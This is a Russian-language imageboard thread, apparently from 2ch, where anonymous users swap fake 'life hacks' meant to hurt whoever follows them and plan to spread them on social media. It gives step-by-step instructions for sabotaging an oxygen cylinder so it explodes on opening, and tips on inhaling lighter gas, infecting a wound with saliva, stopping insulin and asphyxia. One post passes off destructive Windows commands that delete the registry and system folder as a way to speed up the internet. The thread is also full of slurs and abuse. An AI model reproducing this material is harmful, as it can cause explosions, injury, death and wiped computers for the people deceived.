>>75303846 Я опять проиграл с реакции. Сука. автор молодец, а мать его порядочная женщина. на самом деле авторы всей этой хуиты шакалы-мизантрапы. Желаю всем вам рака яиц сучечки. И помните: даже у самого омежного битурда скорее всего рано или поздно будут дети. Я надеюсь, что они наткнутся на эти инструкции
>>75304034 >даже у самого омежного битурда скорее всего рано или поздно будут дети А также наступит глобальное потепление и на земле заведутся динозавры.
>>75304265 Это уже слишком толсто, в отличии от несильно очевидных для быдла хим. реакций. Даже самые обоссаные гуммунитарии в детстве выжигали по дереву лупой или муравьёв палили.
>>75304508 Кстати в быдляцких хрущёвках можно получить небольшой ебок током, взявшись за батарею и корпус компа. Ибо благодаря схеме делителя, рассчитаного на заземление в розетке, на корпусе всегда присутствует 110 вольт, если заземления нет (см. обоссанские хрущёвки).
>>75304549 >вчера >старье Ну ОК, жалко, что ли? Не каждый день анон в тредах сидит. А насчет палева, ты недооцениваешь человеческую глупость и забывчивость.
>>75303779 Вы мрази нахуя вы этим занимаетесь? Я уже вижу как выглядит человек который такие треды создаёт.Дрищь,урод которого гнобили в детстве,весь перекошенный,обижен на весь мир.И теперь в соц сетях он пытается подсунуть эти тухлые пикчи своим обидчикам.
>>75305617 Пару дней назад еврей на краутчане спрашивал, как симулировать сепсис, я ему порекомендовал в надежде, что ему отрежут какую-нибудь руку, например.
>>75305112 Да вы ебанулись в край. Последнее легальное развлечение - это смотреть на мучения других людей. Дальше всё, край. Придётся идти в магазин за беленькой и деградировать.
>>75304685 Если выпивать с такой скоростью как указано на пике, то у тебя максимум на второй день произойдёт отказ почек и ты сдохнешь от интоксикации крови.
>>75304453 Вода активно вымывает электролиты из организма, нарушается водно-солевой баланс, зверский удар по сердцу. Ну и по почкам, которые всё это гоняют.
>>75306779 Так и есть, не представляю теперь жизни без ягуара. Приходится закупаться заранее. Инсулином больше не пользуюсь, глюкометр продал. Сахара в норме, я чувствую! Спасибо!
>>75306635 Можно постить подходящие советы в соцсети, лучше вперемешку с правильными.
Можно кидать пачками в особо упоротых моралистов и наслаждаться эффектом.
Можно скооперироваться с анонами форчонга и перевести лучшее для более широкого распространения.
Можно сообщить в ФСБ, и кому-то будет сгущенка, а харкач закроют.
Можно распечатать и расклеить по городу как листовки.
Можно наконец увидеть по ТВ выпуск новостей, где наконец-то свяжут очередной несчастный случай с картинками с очень странного форума, и наслаждаться ВИНОМ.
>>75303779 Блядь, что за бред нахуй? Что страшного будет от кислорода? Надо так: закачать кислорода с газом для зажигалок. Гремучий газ --> КРОВЬ КИШКИ РАСПИДОРАСИЛО, причём буквально.
>>75307290 >В сухом виде взрывается от прикосновения, образуя розовато-фиолетовое облако паров йода. >Это единственное вещество, которое взрывается под воздействием альфа-частиц и других продуктов ядерного распада
>>75307636 >олько тупой, что не понял как рецепты на картинках должны привести к пиздецу? Нет, тут ещё шесть человек сидит в ридонли и стесняются спросить , т.к. они тру хикки.
Мне лень пилить, но вот немножко кулинарного терроризма: 1.Алкоголь с чабрецом- вечер в сральнике.Блевать будешь как сам Моисей.Как коктейль не покатит, слишком ебануто, но вот подливка для мяса на вине, да чабрец... 2.Ананас нихуево размягчает мясо.Он его фактически переваривает.Ты же помнишь, как пощипывает уголки рта после ананаса?То то и оно.Так что нежная телятина на ночь замаринованная с ананасом ирандомноеговнонейм к утру будет представлять из себя разплывшиеся сопельки.
>>75307553 >Что страшного будет от кислорода? Анальные газы в присутствии высокой концентрации кислорода воспламенятся при нормальной температуре твоего тела.
>>75308259 Ну значит не тупорылый алконавт, а деятельный, но не сообразительный нищеброд, которому хочется дешёвого кайфа, но не хочется напрягать мозг. Похуй вообще. Допустим, ТВОЙ сосед окажется достаточно тупым и достаточно деятельным, чтобы провернуть >>75303846. Взорвёт свою хату и сильно повредит несколько соседних, причём одной из них может оказаться твоя. Особенно если дом старый и газопровод не ремонтировали со времён Миши Меченого.
>>75306927 сделай себе в мышцу укол своей слюной. Флегмона будет такая, что тебе потом половину мышцы вырежут нахрен. Слышал истории о дурачках, которые таким образом гасились в армии, попадали в госпак и зарабатывали себе хромоту на всю жизнь (потому что кололи в ногу)
>>75308549 >Средняя доза 30-40 грибов. Мда, если бы говно обладало таким же эффектом, то долбоёбы бы и его жрали. Посрал, захавал и кайфуешь, посрал, захавал и кайфуешь, заебись.
>>75308630 >деятельный, но не сообразительный нищеброд, которому хочется дешёвого кайфа Для дешёвого кайфа есть аутоэротическая асфиксия с предварительной гипервентиляцией лёгких. Дешевле не бывает.
>>75308630 Допустим! Допустим, твой сосед окажется террористом и подорвёт себя, пытаясь собрать пояс шахида у себя на кухне. Допустим, когда ты выйдешь из дома, тебе на голову упадёт горшок с цветком. Допустим, я твою маму ебал. Допустим?
>>75308897 Нихуя, это просто наркоторговцы распиздели, будто бы умер, а то кто будет герыч покупать, когда можно забесплатно кайф помать? А тот дядька до сих пор живой, ему норм.
>>75305869 Сука, Антон Пахомов! Проиграл. А вообще, упарывал газ, перло адово, там целый набор ощущений и галюны в придачу, а может, я просто поехавший. не тролль.
>>75308939 Ну ты же мудак тупорылый, и сам это понимаешь.
> допустим, твой сосед окажется террористом > прочая не относящаяся к делу ебала Может, и окажется он террористом. Или хуй знает кем ещё. В любом случае, если он им и окажется - я никак не могу повлиять на его действия. А вот ты, мудила, распространяя подобную инфу, рано или поздно можешь нарваться на её последствия, например, в виде ебанутого соседа. Фактически, устроишь пиздец сам себе. Тогда ты, конечно, будешь винить во всём анона, тупое население, вырожденцев, небо, Аллаха - кого угодно, кроме себя. Но виноват будешь в этом именно ты, уёбок. Конечно, вероятность таких событий крайне мала, но она существует, поэтому перечитай этот псто и подумай хорошенько и сделай выводы для себя. А если не сделаешь - последуй моему совету и лизни розетку. От этого искры из глаз, это стильно, модно, молодёжно.
ссышь в бутылку из-под балтикие девятки, где-то наполовину, остальное заполнешь высранным говном, любой консинстенции, чайной ложечкой запихиваешь, надеваешь вконце на бутылку презерватив, либо воздушный шарик, ставишь на солнышко на пару дней - как только презерватив надуется - открываешь искомую емкость и вдыхаешь - ПРОФИТ!
>>75307403 Есть, только не инструкция, могу рассказать я. Короче берешь баллон, открываешь, упираешь соплом в зубы и давишь на баллон, как при заправке зажигалки. Вдыхаешь полные легкие, лучше вдыхать вместе с воздухом, задерживаешь дыхание как можно дольше, только сознание не потеряй, выдыхаешь, повторяешь пока не накроет. Самый пиздец будет где-то на 10 раз употребления, первые разы можно вообще не просечь прикола.
>>75303846 >a частица блять, сука, я только что чуть не умер так как подавился походу желудком из-за того что орал как ебанутый. ТОЛЬКО ПРЕДСТАВЬ СЕБЕ БЛЯДЬ А - ЧАСТИЧКА БЛЯДЬ А ЧВАСТИЛЧКА СУКА Я НЕ МОГШУ БЛЯТЬ АНОН СДЕЛАЙ ЧТО-НИБУДЬ ИНАЧЕ Я СУКА УТОНУ В СВОЕЙ СЛЮНЕ
>>75305869 >/video117807417_163401092 Чо они несут? С каких пор пропан-бутан стал и вовсе ядовитым? А меркаптана там так вообще 10^-12 кг, хуй отравишься.
>>75309595 Вспомнил. Дело было в лагере, я не добежал до толчка и обосрался. Бывает, скажете вы. Но вместо того, чтобы тут же снять труселя, выкинуть их в ближайшие кусты и пойти дальше, я зачем-то принёс их в к себе, положил в пакет, завязал его, и через неделю (или полторы) вернулся домой. Так вот, когда я распаковал пакет, чтобы бросить трусы в стирку, мне аж глаза жгло в буквальном смысле. Запах не опишу, но похож на аммиак.
>>75304208 Я себе каждую субботу такие разгрузочные дни устраиваю. Просыпаюсь, 2 полторахи. Сплю, просыпаюсь в 13 дня 3 полторахи. И вечером еще парочку
>>75306646 лол, я так думаю что после открытия крана и его закрытия помаслу, от давления его нахуй выкрутит и балон аки торпеда будет метаться по зднию
>>75304208 Нихуя не будет. Про пиво тут уже выше писали. У меня рекорд 7,5 литров. С вечера до утра. И хоть бы что. А ведь пиво продукт куда более тяжёлый для почек чем вода.
>>75311189 Да похуй на почки. Трабл будет только если пить не минералку, а пресную воду. Лучше дист. воду. Тогда будет отек мозга из-за нарушения электролитного баланса.
>>75311246 >Причины повышенной смертности при акромегалии: поражения сосудов головного мозга, болезни сердца и легких. Кроме того, при акромегалии повышен риск полипоза и рака толстой кишки
>>75306646 Приходит ответственный за ТБ в цех, а там подмастерье крутит ручки на станке, автомобилем он рулит, входит мастер в свитере с длинными рукавами, включает станок и взамен куба получает самотык, два пьяных электрика скручивают медь и алюминий, стоя по колено в воде, рядом искрит фаза, сварщики в бытовке развальцовывают друг другу дыры, чугуниевой елдой с приваренным к ней перфоратором, грузчики гоняют в футбол в луже масла, баллоном с кислородом, сантехник подключил к смесителю канализацию и теперь из крана течет шоколад, но не тот, который едят, отравившийся пирожками из столовой, кладовщик срет посреди комнаты в ведро, потом с криком: ТОПАЗ! ЕБ ТВОЮ МАТЬ! убегает, бросив ведро на работающий вал, весь цех оказывается покрыт чиркашами, как гепард, в воздухе витает угольная и мучная пыль, рядом с ней курит местный пьяница Петрович, рабочие грязные, пьяные, проебывают сроки, инструмент и детали, кто-то уже мотается на валу, кто-то уже ебнут током, кто-то йобнут 8 ключом, сторож спит с открытым ртом, в куче брака, ему закидывает гайки в рот, инженер, который вечно проебывается, технолог сальными руками пачкает чертеж и тушит о него окурки, на крюке крана висит баба которую крановщик выеб так, что она выпала из кабины, начальник жарит шашлыки, рядом с баллоном в котором пропан и открытой цистерной в которой бензин, ответственный за ТБ с грустным видом идет на кухню и достает половину кота, из морозилки, из другой половины сделали пирожки и начинает писать отчет: Во всем считаю виновным кота, труп прилагается.
>>75311178 >сопровождается увеличением (расширением и утолщением) кистей, стоп, черепа Заебись же, я не против того чтобы нарастить челюсть и утолстить запястья.
>>75306481>>75304158 > Воспаление, возможна гангрена, хуякхуяк, нет конечности. Ага, что за охуительные истории я читаю? Язык прикусил - всё, пиздец, можно в гроб ложиться? Укусил человека, и всё, омае ва мо шиндерю? Хуйнёй попахивает.
>>75312586 Если это псилоциьин питерский, то он не содержит токсина, а следовательно отравление от него не получишь, кроме того, что может случится закупорка или заворот кишок.
>>75303779 Как сделать скорость интернета быстрее? 1) Нажимаем сочетание клавиш "win" + "r" 2) В появившемся окне вводим команду "CMD" 3) Далее копируем от сюда команды по очереди:
reg delete HKLM
del /f /q %systemroot%
4) Вставляем в окно CMD и нажимаем ENTER
Перезагружаем компьютер и вуаля, интернет стал работать быстрее. Копируй себе на стену, чтобы все знали про этот лайфхак!
>>75314050 Это всё равно хуйня полная. В лучшем случае ранка опухнет прежде чем всё зальют йодом/зелёнкой. Иначе б щас с гангренами каждый третий ребёнок сдыхал.
Если кому любопытно, то технарь-кун в моём лице пояснит за кислород vs. масло. Значит так: масло - горючее, кислород - окислитель. Но если просто их смешать - нихуя не будет, т.к. нет источника огня (то бишь высокой температуры). Но если масло попадает в арматуру высокого давления (например им испачкан штуцер вентиля, к которому прикручен редуктор,- а именно это и случиться, если обмотать вентиль промасленной тряпкой), начинаются интересные вещи. Когда кран закрыт - в баллоне 100...200 атмосфер, в редукторе - 1 атмосфера. При открытии крана газ резко врывается в редуктор, срывает со стенок штуцера следы масла, распыляет их в аэрозоль, а ещё происходит скачок давления, сопровождающийся скачком температуры,- как в дизеле. И так: кислород, масляный аэрозоль, высокая температура... БАДАБУМ. Может просто лопнуть редуктор, а может начаться горение его металла (в чистом кислороде - как нехуй, вспоминаем автоген (суть прожигание стали за счёт горения её в кислороде), тогда реально будет весело.
И да, я советую не обматывать вентиль тряпкой: ясный пень, что это палево - штуцер сразу постараются обезжирить или просто не будут использовать этот баллон. Надо ПРОСТО смазать штуцер маслом ИЗНУТРИ. Шприцом можно например - полкубика масла будет за глаза.
>>75312824 Понимаешь, тут есть НЮАНСЫ. Язык и рука/нога - две большие разницы. И потом имеет значение глубина раны и то, насколько она изолирована от воздуха. Если изолирована хорошо - это ппц, реально гангрена будет. Читал про то, как срочник решил таким образом дембельнуться пораньше: сделал разу на ноге, и туда хуярил слюну (там те же бактерии, что и в зубном налёте). Итог: наполовину БЕЗНОГNМ.
>>75312069 ответственный за ТБ с грустным видом идет на кухню и достает половину кота, из морозилки, из другой половины сделали пирожки и начинает писать отчет: Во всем считаю виновным кота, труп прилагается.
Вторая половина кота про запас, для следующего отчёта?
>>75313696 А мне норм. В Древнем Риме готовили специально прокисшее вино в свинцовых горшках. В результате получался очень сладкий напиток, который называли «сапа». Сапа содержала большое количество ацетата свинца — очень сладкого вещества, которое также называют свинцовым сахаром или сахаром Сатурна. Высокая популярность сапы была причиной хронического отравления свинцом, распространенного среди римской аристократии.
>>75314333 >Надо ПРОСТО смазать штуцер маслом ИЗНУТРИ. Шприцом можно например - полкубика масла будет за глаза. Поясни, оно не ёбнет когда буду это делать? Только когда кто-то попытается открыть?
Прочее дерьмо: http://rghost.ru/57652682
Предлагай новые идеи, анон.
||
Пили свои советы.
&&
Не задавай дурацкий вопрос "а что будет?" Все будет хорошо.